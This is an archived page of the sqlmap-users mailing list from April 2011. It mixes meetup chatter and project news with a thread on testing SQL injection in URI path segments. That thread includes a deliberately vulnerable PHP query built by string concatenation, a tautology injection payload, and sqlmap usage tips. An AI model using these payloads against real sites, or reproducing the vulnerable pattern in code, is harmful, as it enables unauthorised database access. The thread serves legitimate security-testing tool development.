http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 23:58:15
|
Hi, On 26 April 2011 04:00, David Guimaraes <sk...@gm...> wrote: > How about a --count switch? To count the number of rows (like sqlsus do)... > and what about column enumerator without setting some table(-T) or DB (-D)? The "column enumerator" is implemented as of r3776. Use either switch --schema or --columns with no -T. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 20:53:09
|
Since nobody showed up, we ate and drunk on your donations ourselves, thanks donors! ;) By the way, Miroslav and I came up with lots of ideas for sqlmap 1.0 - we proved once again that real life brainstorming is way quicker and easier. We have many planned features, enhancements and code adjustments on the way! Cheers, Bernardo On 26 April 2011 09:07, Bernardo Damele A. G. <ber...@gm...> wrote: > Thank you guys for your donations. We will drink for you tonight! > > Hope to see someone joining us, drinks are on us and remember that the > pub has a good deal for wine bottles on Tuesdays ;) > > Cheers, > Bernardo Damele A. G. > > This message was sent from a smartphone > > On 25 Apr 2011, at 19:24, "ja...@ev..." <ja...@ev...> wrote: > >> Well, Im trying to get my buddy Bert to go buy them a pint on me. We'll >> see if he actually does it. >> >> On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...> >> wrote: >>> Which is exactly why I donated to SQLMap last night :). I suggest you >>> do the same, because like you said - they freakin made SQLMap! >>> >>> Ryan >>> >>> ----- Original Message ----- >>> From: ja...@ev... >>> To: sql...@li... >>> Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern >>> Subject: Re: [sqlmap-users] meet up in London >>> >>> Not even one person? You guys are dicks. >>> Buy them some pints, they made sqlmap! >>> >>> -james >>> >>> On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham >>> <ste...@gm...> wrote: >>>> Miroslav Stampar wrote: >>>>> So nobody is willing to have a drink with us :( >>>>> We are both in London few more days so if you change your mind just reply. >>>>> >>>>> Kr >>>> >>>> If it makes you feel better, if I was single and didn't have to justify >>>> the cost of the plane ticket from the US, I'd totally be there ;-) >>> >>> >>> ------------------------------------------------------------------------------ >>> WhatsUp Gold - Download Free Network Management Software >>> The most intuitive, comprehensive, and cost-effective network >>> management toolset available today. Delivers lowest initial >>> acquisition cost and overall TCO of any competing solution. >>> http://p.sf.net/sfu/whatsupgold-sd >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> ------------------------------------------------------------------------------ >>> WhatsUp Gold - Download Free Network Management Software >>> The most intuitive, comprehensive, and cost-effective network >>> management toolset available today. Delivers lowest initial >>> acquisition cost and overall TCO of any competing solution. >>> http://p.sf.net/sfu/whatsupgold-sd >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> ------------------------------------------------------------------------------ >> WhatsUp Gold - Download Free Network Management Software >> The most intuitive, comprehensive, and cost-effective network >> management toolset available today. Delivers lowest initial >> acquisition cost and overall TCO of any competing solution. >> http://p.sf.net/sfu/whatsupgold-sd >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 20:45:36
|
Hi, We have created a Twitter account, @sqlmap[1]. Miroslav and I will post periodic updates about the progress of the project so that users not subscribed to this mailing list and not familiar with svn log[1] also get a feeling of what is going on under the hoods. Also, Twitter statuses now load into the News paragraph of the homepage too. Feel free to follow it - retweets are welcome! [1] https://twitter.com/sqlmap [2] http://svnbook.red-bean.com/en/1.5/svn.ref.svn.c.log.html -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 18:23:50
|
Andres, On 28 Apr 2011, at 13:53, "Andres Tarascó Acuña" <ata...@gm...> wrote: Thanks David! so, to test sveral URI segments, i probable need to use something like: ./sqlmap.py -u http://host/path/chunk1*/chunk2* --data="postparameter=foo" is that right? Yes. what should i type into the "-p" parameter to check sql injections only against chunk2 (instead of attacking "postparameter" ? -p does not support URI "parameters". Run sqlmap with no -p and ctrl+c when the detection phase start again the post data - you will be prompted with a few options, skip to the next parameter is what you need, till sqlmap hits the URI snippet. Bernardo Damele A. G. This message was sent from a smartphone Thanks Andres 2011/4/28 Bernardo Damele A. G. <ber...@gm...> > Indeed, thanks David for replying. > I will update the user's manual with this feature at some point like > someone else pointed out. > > Cheers, > Bernardo Damele A. G. > > This message was sent from a smartphone > > On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote: > > Use * character at param value: > > <http://vulnsite.com/vulnscript/1*/2>http://vulnsite.com/vulnscript/1*/2 > > 2011/4/28 Andres Tarascó Acuña < <ata...@gm...>ata...@gm...> > >> Hello, >> >> I'm new to the list so probably I'm going to ask for something that was >> previously discussed. Anyway, I'm going to try :) >> >> I wish to know if there are plans to support "URI sql injection" in the >> near future. By URI injection i mean testing for sql injections on the URI >> instead of attacking GET/POST/cookie parameters.I see at least 3 scenarios >> where this feature should be required. >> >> >> 1- Its necessary to test URIsegments when a web application is developed >> with frameworks like codeigniter, that disables GET parameters by default, >> and forces some parameters to be retrieved from the URI , like <http://host/> >> http://host/*class/method/value1/value2.* >> * >> The following snippet is an example of a vulnerable application that is >> accessed as <http://host/>http://host/news/show/1 >> >> class news extends CI_Controller { >> function show(id,param2) { >> //do stuff.. >> $sql="select * from table where column='".$id.'"; >> $this->db->query($sql); >> //.... >> } >> } >> On this scenario the attack should be performed against 'param1' for >> example: <http://host/news/show/param1'+OR+'a'='a/param2> >> http://host/news/show/param1'+OR+'a'='a/param2 >> The id parameter is manipulable however as far as i know its not supported >> by default by sqlmap as a testable parameter. >> >> * >> >> 2- Its also required when testing websites for sqlinjections and an URL >> rewrite module is enabled, causing that parameter names are hidden to the >> user >> >> 3- When the URI is not sanitized and is stored into a database for logging >> purposes ( therefore the application becomes vulnerable at least to blind >> timming sql attacks). >> >> >> >> >> Thanks in advance, >> >> >> >> Andres Tarasco >> <http://www.tarasco.org/security>http://www.tarasco.org/security >> >> >> ------------------------------------------------------------------------------ >> WhatsUp Gold - Download Free Network Management Software >> The most intuitive, comprehensive, and cost-effective network >> management toolset available today. Delivers lowest initial >> acquisition cost and overall TCO of any competing solution. >> <http://p.sf.net/sfu/whatsupgold-sd>http://p.sf.net/sfu/whatsupgold-sd >> _______________________________________________ >> sqlmap-users mailing list >> <sql...@li...>sql...@li... >> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Andres T. A. <ata...@gm...> - 2011-04-28 12:53:41
|
Thanks David! so, to test sveral URI segments, i probable need to use something like: ./sqlmap.py -u http://host/path/chunk1*/chunk2* --data="postparameter=foo" is that right? what should i type into the "-p" parameter to check sql injections only against chunk2 (instead of attacking "postparameter" ? Thanks Andres 2011/4/28 Bernardo Damele A. G. <ber...@gm...> > Indeed, thanks David for replying. > I will update the user's manual with this feature at some point like > someone else pointed out. > > Cheers, > Bernardo Damele A. G. > > This message was sent from a smartphone > > On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote: > > Use * character at param value: > > <http://vulnsite.com/vulnscript/1*/2>http://vulnsite.com/vulnscript/1*/2 > > 2011/4/28 Andres Tarascó Acuña < <ata...@gm...>ata...@gm...> > >> Hello, >> >> I'm new to the list so probably I'm going to ask for something that was >> previously discussed. Anyway, I'm going to try :) >> >> I wish to know if there are plans to support "URI sql injection" in the >> near future. By URI injection i mean testing for sql injections on the URI >> instead of attacking GET/POST/cookie parameters.I see at least 3 scenarios >> where this feature should be required. >> >> >> 1- Its necessary to test URIsegments when a web application is developed >> with frameworks like codeigniter, that disables GET parameters by default, >> and forces some parameters to be retrieved from the URI , like <http://host/> >> http://host/*class/method/value1/value2.* >> * >> The following snippet is an example of a vulnerable application that is >> accessed as <http://host/>http://host/news/show/1 >> >> class news extends CI_Controller { >> function show(id,param2) { >> //do stuff.. >> $sql="select * from table where column='".$id.'"; >> $this->db->query($sql); >> //.... >> } >> } >> On this scenario the attack should be performed against 'param1' for >> example: <http://host/news/show/param1'+OR+'a'='a/param2> >> http://host/news/show/param1'+OR+'a'='a/param2 >> The id parameter is manipulable however as far as i know its not supported >> by default by sqlmap as a testable parameter. >> >> * >> >> 2- Its also required when testing websites for sqlinjections and an URL >> rewrite module is enabled, causing that parameter names are hidden to the >> user >> >> 3- When the URI is not sanitized and is stored into a database for logging >> purposes ( therefore the application becomes vulnerable at least to blind >> timming sql attacks). >> >> >> >> >> Thanks in advance, >> >> >> >> Andres Tarasco >> <http://www.tarasco.org/security>http://www.tarasco.org/security >> >> >> ------------------------------------------------------------------------------ >> WhatsUp Gold - Download Free Network Management Software >> The most intuitive, comprehensive, and cost-effective network >> management toolset available today. Delivers lowest initial >> acquisition cost and overall TCO of any competing solution. >> <http://p.sf.net/sfu/whatsupgold-sd>http://p.sf.net/sfu/whatsupgold-sd >> _______________________________________________ >> sqlmap-users mailing list >> <sql...@li...>sql...@li... >> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 12:44:01
|
Indeed, thanks David for replying. I will update the user's manual with this feature at some point like someone else pointed out. Cheers, Bernardo Damele A. G. This message was sent from a smartphone On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote: Use * character at param value: http://vulnsite.com/vulnscript/1*/2 2011/4/28 Andres Tarascó Acuña <ata...@gm...> > Hello, > > I'm new to the list so probably I'm going to ask for something that was > previously discussed. Anyway, I'm going to try :) > > I wish to know if there are plans to support "URI sql injection" in the > near future. By URI injection i mean testing for sql injections on the URI > instead of attacking GET/POST/cookie parameters.I see at least 3 scenarios > where this feature should be required. > > > 1- Its necessary to test URIsegments when a web application is developed > with frameworks like codeigniter, that disables GET parameters by default, > and forces some parameters to be retrieved from the URI , like > http://host/*class/method/value1/value2.* > * > The following snippet is an example of a vulnerable application that is > accessed as http://host/news/show/1 > > class news extends CI_Controller { > function show(id,param2) { > //do stuff.. > $sql="select * from table where column='".$id.'"; > $this->db->query($sql); > //.... > } > } > On this scenario the attack should be performed against 'param1' for > example: http://host/news/show/param1'+OR+'a'='a/param2 > The id parameter is manipulable however as far as i know its not supported > by default by sqlmap as a testable parameter. > > * > > 2- Its also required when testing websites for sqlinjections and an URL > rewrite module is enabled, causing that parameter names are hidden to the > user > > 3- When the URI is not sanitized and is stored into a database for logging > purposes ( therefore the application becomes vulnerable at least to blind > timming sql attacks). > > > > > Thanks in advance, > > > > Andres Tarasco > http://www.tarasco.org/security > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > ------------------------------------------------------------------------------ WhatsUp Gold - Download Free Network Management Software The most intuitive, comprehensive, and cost-effective network management toolset available today. Delivers lowest initial acquisition cost and overall TCO of any competing solution. http://p.sf.net/sfu/whatsupgold-sd _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: David G. <sk...@gm...> - 2011-04-28 12:32:39
|
Use * character at param value: http://vulnsite.com/vulnscript/1*/2 2011/4/28 Andres Tarascó Acuña <ata...@gm...> > Hello, > > I'm new to the list so probably I'm going to ask for something that was > previously discussed. Anyway, I'm going to try :) > > I wish to know if there are plans to support "URI sql injection" in the > near future. By URI injection i mean testing for sql injections on the URI > instead of attacking GET/POST/cookie parameters.I see at least 3 scenarios > where this feature should be required. > > > 1- Its necessary to test URIsegments when a web application is developed > with frameworks like codeigniter, that disables GET parameters by default, > and forces some parameters to be retrieved from the URI , like > http://host/*class/method/value1/value2.* > * > The following snippet is an example of a vulnerable application that is > accessed as http://host/news/show/1 > > class news extends CI_Controller { > function show(id,param2) { > //do stuff.. > $sql="select * from table where column='".$id.'"; > $this->db->query($sql); > //.... > } > } > On this scenario the attack should be performed against 'param1' for > example: http://host/news/show/param1'+OR+'a'='a/param2 > The id parameter is manipulable however as far as i know its not supported > by default by sqlmap as a testable parameter. > > * > > 2- Its also required when testing websites for sqlinjections and an URL > rewrite module is enabled, causing that parameter names are hidden to the > user > > 3- When the URI is not sanitized and is stored into a database for logging > purposes ( therefore the application becomes vulnerable at least to blind > timming sql attacks). > > > > > Thanks in advance, > > > > Andres Tarasco > http://www.tarasco.org/security > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Andres T. A. <ata...@gm...> - 2011-04-28 12:05:42
|
Hello, I'm new to the list so probably I'm going to ask for something that was previously discussed. Anyway, I'm going to try :) I wish to know if there are plans to support "URI sql injection" in the near future. By URI injection i mean testing for sql injections on the URI instead of attacking GET/POST/cookie parameters.I see at least 3 scenarios where this feature should be required. 1- Its necessary to test URIsegments when a web application is developed with frameworks like codeigniter, that disables GET parameters by default, and forces some parameters to be retrieved from the URI , like http://host/* class/method/value1/value2.* * The following snippet is an example of a vulnerable application that is accessed as http://host/news/show/1 class news extends CI_Controller { function show(id,param2) { //do stuff.. $sql="select * from table where column='".$id.'"; $this->db->query($sql); //.... } } On this scenario the attack should be performed against 'param1' for example: http://host/news/show/param1'+OR+'a'='a/param2 The id parameter is manipulable however as far as i know its not supported by default by sqlmap as a testable parameter. * 2- Its also required when testing websites for sqlinjections and an URL rewrite module is enabled, causing that parameter names are hidden to the user 3- When the URI is not sanitized and is stored into a database for logging purposes ( therefore the application becomes vulnerable at least to blind timming sql attacks). Thanks in advance, Andres Tarasco http://www.tarasco.org/security |